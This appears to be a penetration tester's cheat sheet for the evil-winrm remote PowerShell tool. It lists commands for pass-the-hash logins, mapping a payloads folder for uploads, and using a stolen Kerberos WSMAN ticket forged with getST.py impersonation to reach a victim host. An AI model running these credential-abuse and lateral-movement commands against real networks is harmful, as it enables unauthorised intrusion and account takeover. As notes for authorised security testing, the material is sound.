# evil-winrm

evil-winrm is awesome for PowerShell remoting into devices - even with just a local admin hash!

# Connect to host with evil-winrm using docker and an account hash

sudo docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 1.2.3.4 -u administrator -H YOUR-HASH-GOES-HERE

If you're going to connect with a password, replace -H YOUR-HASH-GOES-HERE with -p YOUR-PASS-HERE.

# Connect to host with a local directory mapped for uploads and downloads

This is important. If you're going to connect to a host and want to be able to upload/download files, you need to map a drive like so:

sudo docker run -v /home/sevminsec/Desktop/payloads:/data --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.1 -u 7ms -p supsecpass!

# Use Kerberos

The README talks about how to get Kerberos going with evil-winrm, and I'm not sure how necessary the installation of the Kerberos packages was, nor the editing of /etc/krb5.conf. But what I DO know is I got all sorts of errors trying to get the Kerberos connection made until I did the following command inside of exegol:

evil-winrm -i HOST -r domain.com 

# Misc Kerberos troubleshooting notes

If you're in a RBCD situation where you've stolen a TGS so that you can connect to (for example) the SMB service as admin, I finally had a need to steal a WINRM ticket so I could pass that with evil-winrm. The commands were as follows (with TT-DEVO1 being the victim in a domain called tangent.town:

getST.py -impersonate administrator -spn 'WSMAN/TT-DEV01.tangent.town' -dc-ip 192.168.10.100 'tangent.town/PHANTOM$' -k -no-pass

export KRB5CCNAME=administrator@WSMAN_TT-DEV01.tangent.town@TANGENT.TOWN.ccache 

evil-winrm -i TT-DEV01.tangent.town -r tangent.town --spn WSMAN